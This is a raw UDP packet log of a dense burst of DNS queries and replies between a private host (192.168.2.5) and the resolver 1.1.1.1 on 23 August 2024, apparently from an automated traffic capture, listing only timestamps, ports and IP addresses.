Aug 23, 2024 18:43:29.914455891 CEST	53	54361	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.915445089 CEST	53	61708	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.916116953 CEST	53	65285	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.916199923 CEST	53	58007	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.917051077 CEST	53	54758	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.917799950 CEST	53	51451	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.918479919 CEST	53	57595	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.918648958 CEST	53	49490	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.918694973 CEST	53	62323	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.918731928 CEST	53	61284	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.919353008 CEST	53	64175	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.919646025 CEST	53	62513	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.919723988 CEST	53	60652	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.920171022 CEST	53	60421	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.920690060 CEST	53	49514	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.920733929 CEST	53	50020	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.920804024 CEST	53	56770	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.920908928 CEST	53	60694	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.920919895 CEST	53	60991	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.920931101 CEST	53	63955	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.921559095 CEST	53	50580	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.921571016 CEST	53	53480	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.922074080 CEST	53	54544	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.922178030 CEST	53	51790	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.922894955 CEST	53	64857	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.926592112 CEST	53	57583	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.927685976 CEST	53	60427	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.928200960 CEST	53	63618	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.930951118 CEST	53	62759	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.930959940 CEST	53	61494	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.935254097 CEST	53	50209	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.937027931 CEST	53	55871	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.937062979 CEST	53	55732	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.938060999 CEST	53	59293	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.938167095 CEST	53	52059	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.939002037 CEST	53	50067	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.940399885 CEST	53	51250	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.940588951 CEST	53	64152	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.941098928 CEST	53	53467	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.941183090 CEST	53	51875	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.941193104 CEST	53	63091	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.942490101 CEST	53	54148	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.942711115 CEST	53	55081	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.942948103 CEST	53	59756	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.943166018 CEST	53	50988	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.943634033 CEST	53	62710	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.943727970 CEST	53	56596	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.944268942 CEST	53	51635	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.947611094 CEST	53	55932	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.948759079 CEST	58395	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.949552059 CEST	49220	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.950284004 CEST	62890	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.950951099 CEST	51110	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.951246023 CEST	52833	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.951725960 CEST	52852	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.951742887 CEST	64964	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.952236891 CEST	53515	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.952253103 CEST	65128	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.952692986 CEST	55117	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.952907085 CEST	60689	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.953181982 CEST	65003	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.953536987 CEST	56354	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.954041958 CEST	49717	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.954595089 CEST	58811	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.954890013 CEST	57516	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.955202103 CEST	54959	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.955966949 CEST	55884	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.956517935 CEST	62819	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.957117081 CEST	63047	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.957618952 CEST	60272	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.958111048 CEST	65043	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.959171057 CEST	59684	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.959649086 CEST	53	58395	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.960055113 CEST	60497	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.960274935 CEST	54025	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.960895061 CEST	57587	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.961066008 CEST	55565	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.961828947 CEST	49805	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.961834908 CEST	53	49220	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.961973906 CEST	52639	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.962188005 CEST	53	52833	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.962672949 CEST	53	53515	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.963434935 CEST	53	64964	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.963452101 CEST	53	65128	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.964109898 CEST	60847	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.964854002 CEST	53	49717	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.964930058 CEST	53	56354	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.965135098 CEST	53	58811	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.965837955 CEST	53	57516	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.967520952 CEST	53	62819	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.967808008 CEST	63212	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.968122959 CEST	61594	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.968334913 CEST	54908	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.968365908 CEST	58602	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.968542099 CEST	53	65043	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.968990088 CEST	61112	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.969116926 CEST	62332	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.969125986 CEST	53	63047	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.969376087 CEST	50319	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.969449997 CEST	49609	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.969822884 CEST	61537	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.970072985 CEST	51631	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.970128059 CEST	61955	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.970236063 CEST	53	59684	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.970261097 CEST	54512	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.970480919 CEST	57903	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.970773935 CEST	56439	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.970963001 CEST	55708	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.971203089 CEST	65016	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.971318007 CEST	53	60497	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.971683025 CEST	56195	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.971832991 CEST	63090	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.971896887 CEST	53	49805	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.972281933 CEST	63469	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.972419977 CEST	56114	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.972440004 CEST	53	55565	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.972610950 CEST	53917	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.972901106 CEST	55903	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.973193884 CEST	55784	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.973635912 CEST	61091	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.974412918 CEST	53784	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.974489927 CEST	53	63212	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.975055933 CEST	59908	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.975130081 CEST	53	60847	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.975358009 CEST	64258	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.975528955 CEST	60947	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.976353884 CEST	54890	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.976423025 CEST	57294	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.976623058 CEST	60521	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.976938963 CEST	57486	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.977338076 CEST	56791	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.977665901 CEST	53	56439	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.977770090 CEST	59491	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.979876995 CEST	53	61112	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.979955912 CEST	53	55784	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.980093002 CEST	53	50319	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.981096983 CEST	53	62890	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.981362104 CEST	53	57903	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.982150078 CEST	53	61594	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.982161045 CEST	53	55708	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.982467890 CEST	53	56195	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.982956886 CEST	53	51110	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.983119965 CEST	53	63090	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.983812094 CEST	53	55117	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.983846903 CEST	53	56114	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.984105110 CEST	53	53917	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.984147072 CEST	53	65003	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.984586954 CEST	53	61091	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.985101938 CEST	53	53784	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.985619068 CEST	53	64258	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.986051083 CEST	53	54890	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.986414909 CEST	53	59908	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.987245083 CEST	53	57486	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.987658024 CEST	53	56791	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.989011049 CEST	53	52852	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.989021063 CEST	53	60689	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.989403009 CEST	53	60272	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.991101027 CEST	53	55884	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.991266966 CEST	53	57587	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.992650032 CEST	53	52639	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.996824026 CEST	53	54025	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.000560999 CEST	53	58602	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.000884056 CEST	53	54908	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.001144886 CEST	53	49609	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.001205921 CEST	53	62332	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.001396894 CEST	53	54512	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.002758026 CEST	53	65016	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.004656076 CEST	53	61537	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.004666090 CEST	53	63469	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.008847952 CEST	53	60947	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.009010077 CEST	53	55903	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.009366035 CEST	53	59491	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.010061979 CEST	53	57294	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.121906042 CEST	53	54959	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.127747059 CEST	53	51631	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.133738995 CEST	53	60521	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.135586023 CEST	53	61955	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.492937088 CEST	63517	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.495229006 CEST	52411	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.495771885 CEST	63812	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.496277094 CEST	56040	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.496740103 CEST	62576	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.497221947 CEST	55092	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.497673988 CEST	55380	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.498161077 CEST	64659	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.498658895 CEST	55268	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.499108076 CEST	63780	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.499557972 CEST	62122	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.500005007 CEST	60491	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.500456095 CEST	54351	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.500919104 CEST	51483	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.501775026 CEST	53152	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.502320051 CEST	49976	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.502787113 CEST	53194	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.503233910 CEST	62963	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.503711939 CEST	55929	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.504188061 CEST	62183	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.504652023 CEST	54518	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.505108118 CEST	56381	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.505575895 CEST	64446	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.506040096 CEST	50110	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.506321907 CEST	53	52411	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.506454945 CEST	61154	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.506864071 CEST	63317	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.507309914 CEST	58303	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.507484913 CEST	53	56040	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.507713079 CEST	55877	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.508133888 CEST	49295	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.508596897 CEST	63891	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.509042978 CEST	53715	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.509368896 CEST	53	63812	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.509443998 CEST	63310	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.509780884 CEST	53	62576	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.509989023 CEST	57786	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.510354042 CEST	53	55092	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.511409044 CEST	53	55268	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.512787104 CEST	49548	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.512934923 CEST	64244	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.513096094 CEST	59950	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.513221025 CEST	60035	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.513370037 CEST	55556	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.513494968 CEST	52961	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.513515949 CEST	53	62122	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.513694048 CEST	58529	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.513875008 CEST	61201	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.513999939 CEST	50483	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.514081001 CEST	53	60491	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.514123917 CEST	64771	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.514297962 CEST	58061	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.514503956 CEST	51117	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.514801979 CEST	61393	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.514955044 CEST	65452	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.515146017 CEST	58073	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.515320063 CEST	54109	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.515552044 CEST	62134	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.515763998 CEST	62790	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.515902996 CEST	62728	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.516071081 CEST	58404	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.516210079 CEST	49331	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.516381025 CEST	60209	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.516549110 CEST	51382	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.516697884 CEST	53	53152	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.516707897 CEST	53	53194	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.516752005 CEST	64618	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.516990900 CEST	50837	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.517107964 CEST	53	62963	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.517180920 CEST	62743	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.517338037 CEST	49946	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.517498970 CEST	57654	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.517882109 CEST	57362	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.518014908 CEST	51439	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.518532038 CEST	55216	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.521004915 CEST	53	64446	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.521018028 CEST	53	62183	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.523607969 CEST	53	63310	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.523631096 CEST	53	55877	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.523641109 CEST	53	57786	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.523753881 CEST	53	61201	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.523763895 CEST	53	49548	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.524605989 CEST	53	64244	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.525523901 CEST	53	59950	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.526245117 CEST	53	63517	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.526254892 CEST	53	58073	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.526282072 CEST	53	62134	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.526933908 CEST	53	62728	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.527928114 CEST	53	54109	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.527967930 CEST	53	65452	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.527978897 CEST	53	50483	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.527987003 CEST	53	61393	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.527997017 CEST	53	64771	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.528523922 CEST	53	64659	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.528554916 CEST	53	55380	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.528958082 CEST	53	49946	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.528969049 CEST	53	49331	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.529578924 CEST	53	51382	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.529589891 CEST	53	51439	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.529596090 CEST	53	64618	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.530397892 CEST	53	57654	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.530407906 CEST	53	50837	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.530419111 CEST	53	55216	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.530428886 CEST	53	57362	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.532908916 CEST	53	54351	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.537221909 CEST	53	63780	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.538368940 CEST	53	55929	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.538408995 CEST	53	49976	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.540194988 CEST	53	56381	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.540287971 CEST	53	63317	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.540616035 CEST	53	54518	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.542529106 CEST	53	58303	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.542577982 CEST	53	49295	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.543448925 CEST	53	63891	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.544595957 CEST	53	55556	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.545706034 CEST	53	50110	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.545809984 CEST	53	60035	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.548041105 CEST	53	52961	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.549685955 CEST	53	58529	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.549726963 CEST	53	51117	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.549738884 CEST	53	53715	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.549746990 CEST	53	58061	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.551353931 CEST	53	58404	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.551723957 CEST	53	62790	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.673717976 CEST	53	51483	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.678764105 CEST	53	60209	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.692166090 CEST	53	62743	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.697057962 CEST	53	61154	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:30.711484909 CEST	57179	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:30.931477070 CEST	53	57179	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:31.679991961 CEST	61512	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.680751085 CEST	58539	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.681339025 CEST	51400	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.682058096 CEST	59077	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.682503939 CEST	58562	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.682938099 CEST	52770	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.682993889 CEST	53636	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.683610916 CEST	58673	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.683705091 CEST	57857	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.684309006 CEST	65030	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.684461117 CEST	52717	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.684902906 CEST	58493	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.685527086 CEST	59853	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.685627937 CEST	55245	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.686170101 CEST	60262	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.686283112 CEST	57300	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.686814070 CEST	59852	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.686836004 CEST	63408	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.687550068 CEST	55846	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.687911034 CEST	60855	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.688050985 CEST	53888	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.688137054 CEST	60842	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.688617945 CEST	49838	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.688617945 CEST	49186	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.689603090 CEST	54225	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:31.690041065 CEST	55638	53	192.168.2.5	1.1.1.1
